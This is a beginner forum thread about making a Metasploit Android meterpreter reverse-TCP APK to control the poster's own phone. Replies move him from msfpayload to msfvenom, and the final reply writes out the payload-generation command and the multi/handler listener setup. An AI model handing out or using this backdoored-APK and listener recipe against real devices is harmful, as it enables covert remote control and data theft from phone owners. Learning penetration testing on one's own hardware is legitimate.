Hello guys i am new to this backtrack os i wanna learn penetration tests and i learned somethings watching video now i have a problem. I want to start a meterpreter session to control my android phone i watched many videos to learn this so when trying my self to do it.. Afternwatching videos... So my command in terminal of backtrack 5 r3 . was =msfpayload -p android/meterpreter/reversetc LHOST=(MYip) LPORT=4444 R>TEST.apk . so when i xecute this command after waiting sometim it shows Invalid payload= android/meterpreter/reversetcp . so please anyone tell me what i am doing wrong and tell a solution for that please.. I am new and enthusiast for learning new things
Hello...I would highly recommend you to use MSFVENOM (combination of both msfpayload & msfencode) on KALI Linux 2.0 (u better use kali than backtrack as it has plenty of features and tools)
Ok i had started download for kali linux 1.6 will it work?... Its almost done now or i should get 2.0 only
kali 2.0 only has msfvenom....u better download kali 2.0 and play with it...it would be useful for you as i believe you are noob..
Ok guys now i got kali linux so now i started that meterpreter and tried some stuff but the thing is that was only on my wifi so what should i do if i want to control my phone when it is umm using sim data and not wifi ?_

Hi All, Sorry for late reply. Try this one. msfvenom -p android/meterpreter/reversetcp LHOST= yourIP LPORT=anyport > filename.apk after you do this set the listener. To do this you have to hit Metasploit msf > use/exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reversetcp msf > set LHOST= "your IP" msf > exploit Hope it helps...if you still facing any issue please let me know..
